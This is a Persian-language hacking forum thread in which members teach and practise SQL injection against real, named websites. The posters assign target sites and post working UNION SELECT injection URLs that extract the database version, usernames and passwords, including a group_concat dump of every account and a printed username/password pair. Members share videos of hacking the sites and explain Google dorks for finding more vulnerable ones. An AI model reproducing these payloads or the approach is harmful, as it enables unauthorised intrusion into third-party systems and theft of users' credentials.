[Only_AmniaT]

خوب بعد از يه اموزش تقريبا كامل يه تارگت ( سايت اسيب پذير ) براتون ميزارم بگردين توش باگ پيدا كنين و حمله كنين و username و password رو بدست بياريد و در همينجا بگيد تا مشكلاتتونو رفع كنيم !
اگه تونستيد كاري كنيد بگيد : اگه مشكليم داشتيد بازم بگيد ‌:

تارگت 1 : http://www.lam.org

نكته : 3 روز ديگه ادامه ميديم بحث رو تو اين 3 روز سوالاتتونو بپرسيد ...

شاد باشين ...

[alikaka]

Bug in: http://www.lam.org/news/article.php?id='

Number of columns: 9

Shown columns: 2, 3, 4, 5, 6, 7, 8

Table Name: CMS_Users

حالا چیکار کنم؟

[Only_AmniaT]

نقل قول:

نوشته اصلی توسط alikaka

Bug in: http://www.lam.org/news/article.php?id='

Number of columns: 9

Shown columns: 2, 3, 4, 5, 6, 7, 8

Table Name: CMS_Users

حالا چیکار کنم؟

حالا بايد ورژنشو بيرون بكشي ببيني بالاي 5 هست يا پايين تر از 5 و بعد هم ....

نقل قول:

http://www.lam.org/news/article.php?id=-1%20union+select+1,2,3,4,5,version(),7,8,9--

5.0.51a-log ورژن بالاي 5 هستش حالا بايد مثل اموزشي كه در اين تاپيك دادم حملتو كامل كني ...

نكته : هميشه از نرم افزار براي پيدا كردن باگ استفاده نكنيد ! - بعضي موقع ها هست كه سايت باگ داره ولي برنامه نشون نميده اين واسه 80% مواقع هستش ...

[CrazyMember]

نقل قول:

نوشته اصلی توسط Only_AmniaT

خوب تا اينجا اومديم كه Table و Column ادمين يا يه قسمت سايت رو كه ميخوايم بهش نفوذ كنيم ( مثلا قسمت كاربران سايت ) بدست اورديم !
در اين پست استفاده از table و Column رو ميخوايم ياد بگيريم ! به اين صورت كه :‌
اول ستون هارو اماده ميكنيم :

کد PHP:

http://www.navr-bg.org/news.php?id=-84+union+select+1,2,3-- 


بعد from رو به ستون ها ezafe ميكنيم ! و بعد از اون تيبلي كه ميخوايم ازش اطلاعات رو بكشيم بيرون رو ميزنيم به اين صورت :
نكته : هر تيبل mokhtase كاره خودشه ! مثلا ما داريم رو تيبل accounts كار ميكنيم كه اين تيبل واسه قسمت كاربران هستش ! )

کد PHP:

http://www.navr-bg.org/news.php?id=-84+union+select+1,2,3+from+accounts-- 


حالا تيبل ما و سايت اماده هست كه اطلاعات رو به ما بده ! حالا ما داخل يكي از ستون هاي كه آزاده بايد كولومن هاي مورد نظرمونو بزنيم !
نكته : هر كولومن mokhtase تيبل خودشه !
به اين صورت :
خوب اول user يا همون نام كاربري رو بيرون ميكشيم :

کد PHP:

http://www.navr-bg.org/news.php?id=-84+union+select+1,username,3+from+accounts-- 


چيزي كه ميده : valya
و بعدش هم pass يا همون پسورد :

کد PHP:

http://www.navr-bg.org/news.php?id=-84+union+select+1,password,3+from+accounts-- 


چيزي كه ميده : outdoor
خوب اينجا فقط نام كاربري و پسورد اولين كاربر رو داريم و ميتونيم وارد بشيم ( داخل اين سايت از گوشه سمت چپ قسمت ورود داره )
براي بدست اوردن بقيه نام كار بري ها ميتونيم همونتور كه تو درس هاي قبلي گفتي از group_concat() l يا ... استفاده كنيد كه قبلا بهش پرداختيم ... به اين شكل ميشه :

کد PHP:

http://www.navr-bg.org/news.php?id=-84+union+select+1,group_concat(username,0x3a,password),3+from+accounts-- 


همينتور كه ميبينيد 2 كاربر بيشتر نداره و ميتونيد وارد بشيد ! ....
نكته : 0x3a داخل HEX يعني ( : ) ! براي جدا كردن به كار ميره ....

هك به معني اين نيست كه وارد پنل ادمين شي و صفحه index رو تغيير بديم تو درس هاي ما به معني نفوذ به سايت هست كه ما اين كارو كرديم به همين روش ميتونيم تيبل و كولومن هاي ادمين هم در بياريم و وارد پنل ادمين يعني مدير سايت بشيم و همه كار كنيم .. من فقط ميخوام به شما كمك كنيم كه داخل SQL پيشرفت كنيد !

خوب خدا كنه تا اينجا رو خوب ياد گرفته باشين اگه هم نه سوالاتتونو همينجا بپرسيد حتي كوچك ترين سوال هارو بپرسيد !

موفق و پيروز باشيد ...

داداش بیا اینم فیلم هک شدن همین سایت (http://www.navr-bg.org) پنج دقیقه کارش بود !
تارگت دیگه ای هم گذاشتید از هک شدنش فیلم می گیرمو میزارم !

[Only_AmniaT]

نقل قول:

داداش بیا اینم فیلم هک شدن همین سایت (http://www.navr-bg.org) 5 دقیقه کارش بود !
تارگت دیگه ای هم گذاشتید از هک شدنش فیلم می گیرمو میزارم !

ممنون ولي من GhaSTe هك كرنشو ندشتم كه اگه ببيني خيلي با joziat گفتم ميخواستم ياد بگيرين ... ( بچه ها ...)
و ميخواستم هك SQL v, ياد بگيرين نه اماده باشن براي استفاده از برنامه ياد بگيرن چطوري خودشون اين كاراو كنن ه متكي به برنامه باشن مثلا الا يه سايت بهت بدم كه نه اين برنامه نه هيچ برنامه ديگه ( بجز برنامه هاي خيلي قوي ) اصلا تشخيص ندن كه باگ داره ؟ هميشه نميشه از برنامه استفاده كرد !

ولي بازم ممنون ميخواستم خودم براش يه فيلم كامل بسازم ولي زهمت كشيدي ممنون ...

شاد باشين ...

[CrazyMember]

نقل قول:

نوشته اصلی توسط only_amniat

ممنون ولي من ghaste هك كرنشو ندشتم كه اگه ببيني خيلي با joziat گفتم ميخواستم ياد بگيرين ... ( بچه ها ...)
و ميخواستم هك sql v, ياد بگيرين نه اماده باشن براي استفاده از برنامه ياد بگيرن چطوري خودشون اين كاراو كنن ه متكي به برنامه باشن مثلا الا يه سايت بهت بدم كه نه اين برنامه نه هيچ برنامه ديگه ( بجز برنامه هاي خيلي قوي ) اصلا تشخيص ندن كه باگ داره ؟ هميشه نميشه از برنامه استفاده كرد !

ولي بازم ممنون ميخواستم خودم براش يه فيلم كامل بسازم ولي زهمت كشيدي ممنون ...

شاد باشين ...

منم به این جمله :

نقل قول:

نكته : هميشه از نرم افزار براي پيدا كردن باگ استفاده نكنيد ! - بعضي موقع ها هست كه سايت باگ داره ولي برنامه نشون نميده اين واسه 80% مواقع هستش ...

اعتقاد دارم اما کار گروه آشیانه حرف نداره برای کاربران که هنوز اول راهن چیز بسیار عالی هست !
من توی فیم هام از این برنامه استفاده می کنم که دوستان گیج نشن که بگن این کد از کجا اومد !

[CrazyMember]

بفرماییید اینم فیلم هک شدن این تارگتتون : http://www.lam.org

[MaLaS]

اولا با تشکر از تاپیک عالیتون Only_AmniaT جان و با تشکر از همیاری آقا PeyManDanGeR.

نقل قول:

MySQL = PHP
MsSQL = ASP
Acces = ASP , ASPX
and ....

سایت های با فرمت Html چه سایت هایی هستند؟؟؟؟

نقل قول:

شما ميتونيد با وسيله بعضي از دستورات ادرس هاي سايت هارو سرچ كنيد نه مطالب سايت ها رو و ما هم به ادرس اهتياج داريم نه مطالب پس بايد از دستورات مخصوصي استفاده كنيم مثل :‌ [inurl : " DORK " l ا] به جاي DORK بايد Dork مورد نظرتونو بزاريد كه براي هر باگ يك dork مخصوص وجود داره منظورم اين نيست كه فقط يك نوع dork براي يك نوع حمله هست مثلا براي MySQL بايد فقط يچيزي سرچ كرد و براي بقيه هم ... نه ! :
ما در inurl: " Dork " l ا ميگيم اي گوگل بگرد دنبال فلا صفحه ميان سايت ها در كل دنيا ! ok ؟

جریان اسم Dork چیه؟؟؟؟

دستور هست چیه؟؟؟

****
الان تا اینجا خوندم...بازهم سوال بود مزاحم میشم.
****

نقل قول:

نكته : 3 روز ديگه ادامه ميديم بحث رو تو اين 3 روز سوالاتتونو بپرسيد ...

چرا آخه؟؟؟

3 روز که خیلی کمه!!!!

راستی اگه تونستید زحمت آموزشش تصویری رو هم بکشید عالی میشه!

[alikaka]

حالا صفحه ی ادمین رو چی جوری پیدا کنیم؟

[CrazyMember]

نقل قول:

نوشته اصلی توسط MaLaS

اولا با تشکر از تاپیک عالیتون Only_AmniaT جان و با تشکر از همیاری آقا PeyManDanGeR.



سایت های با فرمت Html چه سایت هایی هستند؟؟؟؟




جریان اسم Dork چیه؟؟؟؟

دستور هست چیه؟؟؟

****
الان تا اینجا خوندم...بازهم سوال بود مزاحم میشم.
****



چرا آخه؟؟؟

3 روز که خیلی کمه!!!!

راستی اگه تونستید زحمت آموزشش تصویری رو هم بکشید عالی میشه!

سایت های HTML آسیب پذیر به باگ SQL نیستند و به خاطر همین از اونا صحبت نکردیم و در جلسات بعد بهشون میرسیم ...
ببینید یه سایت وقتی خودشو به گوگل معرفی می کنه تمام صفحاتش به گوگل معرفی میشن و گوگل می تونه تمام صفحاتشون رو بگرده !
حالا ما با دادن یه کلمه خاص به گوگل می گیم که دنبال صفحاتی از سایت بگرده که ممکنه به باگ مورد نظر ما آسیب پذیر باشن !
حالا اون کلمه ای که ما بخوایم به گوگل بدیم به باگ مورد نظر ما بستگی داره ...
یعنی اینطوری :

کد:

inurl "Dork"

به جای دDork ما باگ رو میزاریم و میگیم بگرده اونم سایت هایی رو در اختیار ما میزاره که باید چک کنیم ..

نقل قول:

3 روز که خیلی کمه!!!!

راستی اگه تونستید زحمت آموزشش تصویری رو هم بکشید عالی میشه!

شما توی این 3 روز سوالاتتون رو بپرسید اگر وقت کم اومد ما بحث رو عقب میندازیم.
من که برای هک هر کدوم از سایت های این تاپیک یه فیلم آموزشی گذاشتم مگه آموزش تصویری با فیلم فرق می کنه !